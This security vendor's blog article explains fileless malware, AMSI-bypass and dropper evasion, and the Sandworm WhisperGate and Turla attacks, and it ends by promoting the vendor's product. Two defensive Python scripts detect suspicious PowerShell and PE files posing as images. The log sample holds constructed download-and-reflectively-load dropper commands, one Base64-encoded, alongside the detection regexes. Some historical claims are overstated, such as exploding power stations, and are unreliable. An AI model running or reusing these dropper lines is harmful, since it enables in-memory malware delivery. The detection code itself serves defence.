
Current cyber solutions focus on (and are limited to) file-based malware. So, over the past few years, attackers have shifted to a stealthier, more evasive approach: embedding their malicious code within a program’s active memory. There is no download, no trace on the filesystem, and no recognizable signature or behavior for traditional solutions to detect. This allows attackers to hide in plain sight, disguised to the defender as normal, benign activity.

For a long time, fileless techniques were the domain of nation-states, requiring large teams and endless resources to support the development of this highly sophisticated software. However, as more and more exploits have been leaked, and more malware has been reverse-engineered, fileless techniques have become a staple of modern cyberattacks, increasing by 1400% since 2022. The current estimate is that 91% of ransomware samples use some kind of fileless component. And they’re affordable, with variants like XWorm and Bunny Loader available on the dark web for a few hundred dollars apiece.

There are many in-depth fileless resources available online, notably Alex Adomov’s lecture at VB 2023 illustrating the core aspects of these devastating attacks. Here, though, is a brief overview of their history and of their current and future impact.

Anatomy of a Fileless Attack

Fileless Attack Types [1]

Fileless attacks can be broken down into three types.

  • Type One — There is no file trace on the Operating System. Malware behavior is limited to the process memory space and does not interact with outside components. A common example of this is a PowerShell remote exploitation attack. In this case, a dropper is used to download an obfuscated and encoded DLL which is loaded and executed completely in PowerShell process memory.
  • Type Two — Malware does not write files to disk, but some files may be used indirectly. For example, saving malicious code to the registry is a common practice for establishing malware persistence. Even though no file is created on the system, the registry still establishes a footprint that can be traced by the defender.
  • Type Three — Malware requires some sort of file footprint to establish execution and persistence. For example, by creating a new task in the task scheduler or requiring a macro in a Word document to establish initial access, files can still assist the kill chain even though the actual malicious payload may not reside within the file itself.

A majority of attackers use Types Two and Three to establish initial access and persistence, while the payload itself resides within a PowerShell or JavaScript script.

Defense Evasion (MITRE ATT&CK Tactic TA0005)

Traditional defenses are great at what they were designed to do: scanning for the known patterns and signatures of previously observed malware. What makes fileless attacks so dangerous is their ability to circumvent everything traditional solutions know to do. These are some of the fileless techniques currently used to bypass and disable existing protections.

  • AMSI Bypass — The Antimalware Scan Interface (AMSI) in newer versions of Windows allows AVs to scan executables and commands before they are run. Its DLL acts as an intermediary, iterating through every AV’s scan function to determine whether a file is malicious. However, by patching the AMSI DLL code in runtime memory, attackers can effectively override the scanning process, disabling any existing cybersecurity solution’s ability to scan for malware.
  • Remote Execution (Droppers) — AVs scan files and data structures in the filesystem for indicators of malware. However, modern fileless malware leverages remote execution to limit malicious code’s exposure to the target system. By leveraging a component called a dropper, attackers can insert a piece of stub code on the target system to disable existing protections before downloading the malicious code from a remote server. Since the downloaded code will be loaded and executed from the dropper or another benign program, no footprint will exist for scanners to detect.
  • Obfuscation/Encryption — Most modern AI scanning models rely on plain text patterns to detect malicious activity. This allows attackers to leverage obfuscating commands, key data encryption, and even something as simple as changing the name of a function to bypass traditional solutions.
  • Reflective Code Loading — A common PowerShell technique is to load a DLL into memory and execute it from there. Oftentimes this is combined with a dropper: the dropper downloads an encoded DLL and then loads it into the current memory context for execution. Currently, MITRE only recommends monitoring for this command as a mitigation, leading to high false positive rates for monitoring solutions.
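The four evasion techniques above all leave traces in PowerShell script-block logging (Event ID 4104), even when nothing touches disk. The script below is an added example, not part of the original article, of how a defender can turn MITRE’s bare “monitor for this command” advice into something with a lower false-positive rate: each indicator (reflective assembly load, download cradle, Base64 decoding, references to the AMSI DLL or its scan function, a Discord CDN host) carries a weight, a line only alerts when the combined score crosses a threshold, and any -EncodedCommand argument is decoded (PowerShell encodes it as UTF-16LE Base64) and re-scanned so obfuscation does not hide the chain. The weights, the threshold, and the sample log lines are constructed for illustration.

```python
"""Score PowerShell script-block log lines for fileless-attack indicators (added example)."""
import base64
import binascii
import re
from typing import Optional

# Each indicator: (name, compiled regex, weight). The weights are assumed values chosen so
# that a single common action (one download, one assembly load) stays below ALERT_THRESHOLD,
# while the dropper -> reflective-load chain crosses it.
INDICATORS = [
    ("reflective_load", re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\(", re.I), 3),
    ("download_cradle", re.compile(r"Net\.WebClient|Download(String|Data|File)|Invoke-WebRequest", re.I), 2),
    ("base64_decode", re.compile(r"FromBase64String", re.I), 2),
    ("amsi_reference", re.compile(r"amsi\.dll|AmsiScanBuffer", re.I), 4),
    ("discord_cdn", re.compile(r"cdn\.discordapp\.com", re.I), 1),
]
ENCODED_CMD_WEIGHT = 2
ALERT_THRESHOLD = 5
# -e / -enc / -EncodedCommand followed by a Base64 blob.
ENCODED_RE = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.I)


def decode_encoded_command(line: str) -> Optional[str]:
    """If the line carries an -EncodedCommand argument, return its decoded UTF-16LE text."""
    m = ENCODED_RE.search(line)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def score_line(line: str) -> dict:
    """Return {'score', 'hits', 'alert'} for one script-block log line."""
    texts = [line]
    hits = {}
    decoded = decode_encoded_command(line)
    if decoded is not None:
        texts.append(decoded)  # scan the decoded payload as well as the raw line
        hits["encoded_command"] = ENCODED_CMD_WEIGHT
    for name, pattern, weight in INDICATORS:
        if any(pattern.search(t) for t in texts):
            hits[name] = weight
    score = sum(hits.values())
    return {"score": score, "hits": sorted(hits), "alert": score >= ALERT_THRESHOLD}


def triage(lines):
    """Return only the lines (with their scores) that cross the alert threshold."""
    return [(line, score_line(line)) for line in lines if score_line(line)["alert"]]


# Constructed sample log lines (not real telemetry). The fourth line is the third one's
# chain hidden behind -EncodedCommand, built here so the Base64 is exact.
_ENCODED = base64.b64encode(
    "[System.Reflection.Assembly]::Load((New-Object Net.WebClient)"
    ".DownloadData('http://example.invalid/a.png'))".encode("utf-16-le")
).decode("ascii")

SAMPLE_LOG = [
    # benign admin activity: no indicators
    "Import-Module ActiveDirectory; Get-ADUser -Filter * | Export-Csv users.csv",
    # one indicator only: a plain download, common in legitimate update scripts
    "Invoke-WebRequest -Uri https://updates.example.internal/manifest.json -OutFile manifest.json",
    # dropper chain: fetch an 'image' from a CDN and load the bytes as an assembly
    "$b=(New-Object Net.WebClient).DownloadData('https://cdn.discordapp.com/EXAMPLE/photo.png'); "
    "[System.Reflection.Assembly]::Load([byte[]]$b)",
    # the same chain, obfuscated with -EncodedCommand
    "powershell.exe -enc " + _ENCODED,
]

if __name__ == "__main__":
    for line, result in triage(SAMPLE_LOG):
        print(result["score"], result["hits"], line[:80])
```

Run as-is, only the last two sample lines alert: the plain Invoke-WebRequest line scores 2, which is below the threshold, so a routine update script does not page anyone, while the download-plus-reflective-load chain scores 6 and its encoded twin scores 7 because the decoded payload is matched in addition to the encoding itself.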

Example 1: Sandworm APT

Sandworm is an element within the Russian intelligence service that is dedicated to executing the Kremlin’s most high-profile hacking efforts, often directed at their target’s critical infrastructure.

Russian Government Associated APTs [1]

Some of the most devastating cyber-attacks in history have been spun out of the Sandworm group, mainly due to the utilization of fileless components. For example:

  1. Black Energy (2015) — A trojan developed to establish a DDoS capability within the Ukrainian energy sector infrastructure. The malware was initially launched through spear-phished Excel documents with an embedded macro that launched a PowerShell dropper. The attack left 230,000 residents without power and affected 2 of 3 distribution centers.
  2. Industroyer (2016) — Malware was spread throughout Industrial Control System (ICS) substations, completely opening every circuit and causing power stations to explode. This attack leveraged a combination of macros and remote execution for initial infection alongside a data wiper to remove traces of itself. This attack caused thousands of homes in Ukraine to lose power.
  3. NotPetya (2017) — The most damaging attack of its time, causing over $10 billion in damages. Intended for Ukrainian government facilities, the worm quickly spread throughout the globe, notably affecting Maersk, one of the world’s largest shipping distributors, and Merck Pharmaceuticals, in addition to multiple hospitals and banks. Remote execution and obfuscated fileless droppers were leveraged for the initial infection.
  4. Olympic Destroyer (2018) — This attack intended to wipe out the Winter Olympics’ digital infrastructure during the Opening Ceremonies. Fortunately, the attack had little effect on the games, but a post-mortem analysis found several sophisticated evasion techniques including polymorphic mutation, data wiping, and use of the NSA’s leaked EternalRomance exploit.
  5. WhisperGate (2022) — Deployed to destroy Ukrainian government systems during initial Russian hostilities. Similar to NotPetya, attackers successfully vandalized over 80 Ukrainian government websites.

As an exemplar for the anatomy of a Sandworm fileless attack, let’s take a closer look at the WhisperGate attack.

WhisperGate Overview [1]

As seen above, the WhisperGate malware can be broken down into two stages. Stage One uses the MBR utility to wipe the disk, while in Stage Two a dropper is used to download the file-wiper malware into PowerShell, where it is subsequently executed within memory.

Whispergate Attack Stage 2 Process [1]

In the attack process diagram for Stage Two, the dropper stub code downloads an image from a Discord CDN server. However, this image is actually an obfuscated .Net DLL that stores the respective malware. At this point, the .Net DLL is injected into a benign Windows utility named InstallUtil.exe, where Process Hollowing is leveraged to embed the malware within the program.
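The “image” in this stage is only an image by name; its bytes are a .NET DLL. A defender who inspects what a script actually downloaded, rather than what the URL or Content-Type claims, can catch this before the reflective load. The following is an added example (not code from the article or from any vendor) that classifies a downloaded blob by its magic bytes: it walks the DOS header to e_lfanew, checks the PE signature, reads the optional header, and looks at data directory 14 (the CLR runtime header), which is non-zero only in a managed .NET assembly. The helper that builds a minimal PE-shaped blob for the demo and the file names are constructed for illustration.

```python
"""Flag a PE/.NET assembly masquerading as an image by checking magic bytes (added example)."""
import struct

# Magic numbers for the image formats a dropper might claim to fetch.
IMAGE_MAGICS = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


def pe_info(data: bytes):
    """Return {'is_pe', 'is_dotnet'} if the blob parses as a PE file, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 24  # optional header follows the 4-byte signature + 20-byte COFF header
    if opt + 2 > len(data):
        return {"is_pe": True, "is_dotnet": False}
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x10B:    # PE32
        n_dirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:  # PE32+
        n_dirs_off, dirs_off = opt + 108, opt + 112
    else:
        return {"is_pe": True, "is_dotnet": False}
    if n_dirs_off + 4 > len(data):
        return {"is_pe": True, "is_dotnet": False}
    n_dirs = struct.unpack_from("<I", data, n_dirs_off)[0]
    clr_off = dirs_off + 14 * 8  # data directory 14 = CLR runtime header (RVA, size)
    is_dotnet = False
    if n_dirs > 14 and clr_off + 8 <= len(data):
        rva, size = struct.unpack_from("<II", data, clr_off)
        is_dotnet = rva != 0 and size != 0
    return {"is_pe": True, "is_dotnet": is_dotnet}


def classify(data: bytes) -> str:
    """Label a blob by its bytes, never by its claimed file name."""
    info = pe_info(data)
    if info:
        return "dotnet-pe" if info["is_dotnet"] else "pe"
    for label, magic in IMAGE_MAGICS.items():
        if data.startswith(magic):
            return label
    return "unknown"


def is_masquerade(filename: str, data: bytes) -> bool:
    """True when the name claims an image but the content is a PE executable."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in IMAGE_MAGICS and classify(data) in ("pe", "dotnet-pe")


def _build_fake_pe(with_clr: bool) -> bytes:
    """Constructed minimal PE32-shaped blob (headers only, not a loadable binary)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)              # e_lfanew -> right after DOS header
    nt = bytearray(b"PE\0\0" + bytes(20))                  # signature + zeroed COFF header
    opt = bytearray(96 + 16 * 8)                           # PE32 optional header, 16 directories
    struct.pack_into("<H", opt, 0, 0x10B)                  # PE32 magic
    struct.pack_into("<I", opt, 92, 16)                    # NumberOfRvaAndSizes
    if with_clr:
        struct.pack_into("<II", opt, 96 + 14 * 8, 0x2008, 0x48)  # CLR header RVA/size
    return bytes(dos + nt + opt)


# Constructed samples: a fake .NET DLL, a fake native PE, and a stub PNG.
FAKE_DOTNET_DLL = _build_fake_pe(with_clr=True)
FAKE_NATIVE_PE = _build_fake_pe(with_clr=False)
FAKE_PNG = IMAGE_MAGICS["png"] + bytes(16)

if __name__ == "__main__":
    for name, blob in [("photo.png", FAKE_DOTNET_DLL), ("photo.png", FAKE_PNG)]:
        print(name, classify(blob), "MASQUERADE" if is_masquerade(name, blob) else "ok")
```

In a proxy, EDR or sandbox pipeline this check runs on the response body of every download a script initiates; a “.png” whose bytes classify as dotnet-pe is exactly the stage-two artifact described above, and it is caught at the network boundary rather than after InstallUtil.exe has been hollowed.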

Reflective Loading [1]

Once the DLL is loaded into memory, reflective loading is used to filelessly execute the respective malware without any filesystem interaction. Because the initial payloads were disguised as images, downloaded remotely, and executed within benign processes, the attackers were able to bypass the state-of-the-art commercial protections running on the systems.

Example 2: Turla APT

Turla APT, linked to the Russian Federal Security Service (FSB), has been active since at least 2004, targeting several high-profile government and defense organizations around the world, including:

  1. US Central Command (2008)
  2. Finnish Ministry of Foreign Affairs (2013)
  3. Swiss defense contractor RUAG (2014–2016)
  4. German Bundestag (2017–2018)

Similar to some of the Sandworm attacks, Turla leveraged spear phishing to gain entry into target systems: the attachments were disguised as Excel documents but also carried embedded dropper macros.

Turla Spear Phishing Email Attachment [1]

In the second stage, this approach leveraged JavaScript code to download and invoke the eventual payload.

Turla Invoking Backdoor Payload [1]

Finally, the payload was downloaded as an obfuscated .Net payload and executed within PowerShell process memory using the same reflection technique leveraged by Sandworm.

Turla .Net Reflection for Payload Execution [1]

This resulted in a backdoor to the attacker command and control server, allowing for future interactions with the target system.

Turla Backdoor Execution [1]

Fileless Threats are Everywhere

It is critical to note how capable fileless attacks are at expanding beyond their initial targets. NotPetya was intended for the Ukrainian government, but organizations around the world were heavily compromised. Increasingly, hospitals, banks, schools and other services suffer the brunt of collateral damage. And while Sandworm and Turla are nation-state backed actors, it is crucial to understand that now even unsophisticated attackers have access to the same set of tools that once required a hostile nation’s cyber A-team.

Due to leaks, increased education and awareness, and open-source tools, fileless attack techniques have been trickling steadily onto the dark web, allowing cyber criminals to execute complex attacks at a fraction of the cost. Assisted by generative AI tools like WormGPT (ChatGPT for cyber-attacks), defense evasion and long-term persistence without detection are easier now than they have ever been.

Unlike hostile nations, criminals aren’t usually trying to accomplish a political agenda. They’re out to inflict maximum damage on a target that is likely to pay. Healthcare, financial, entertainment, transportation, manufacturing, education – the industry itself doesn’t matter. And whether it is the Rhysida attack which shut down 17 hospitals and 111 clinics, the Mr. Cooper attack which affected over four million customers, or the Caesar’s/MGM Casino attack which shut down operations for a week and a half, victims are faced with a simple but unthinkable choice: give in or watch their organizations burn to the ground.

The reactive nature of traditional solutions means that organizations must wait for an attack to occur before taking action, scanning for known signatures instead of proactively mitigating malicious activity. By continuously evolving and incorporating fileless techniques, attackers are able to stay one step ahead and maximize their criminal gain. Until defenders are equipped to stop attacks that leave no trace, fileless malware will continue its exponential growth.

How Arms Cyber can help

The Arms Cyber ransomware solution employs a comprehensive, multilayered defense-in-depth approach that combats ransomware at every stage of execution. Utilizing a mix of cutting-edge strategies, traditional defenses are transformed into a moving maze, designed to disorient and effectively disrupt even the most advanced attackers. From initial intrusion, through attempts at evasion, to malicious payload execution, Arms Cyber identifies and neutralizes ransomware threats earlier and more effectively than signature-based and behavioral methodologies.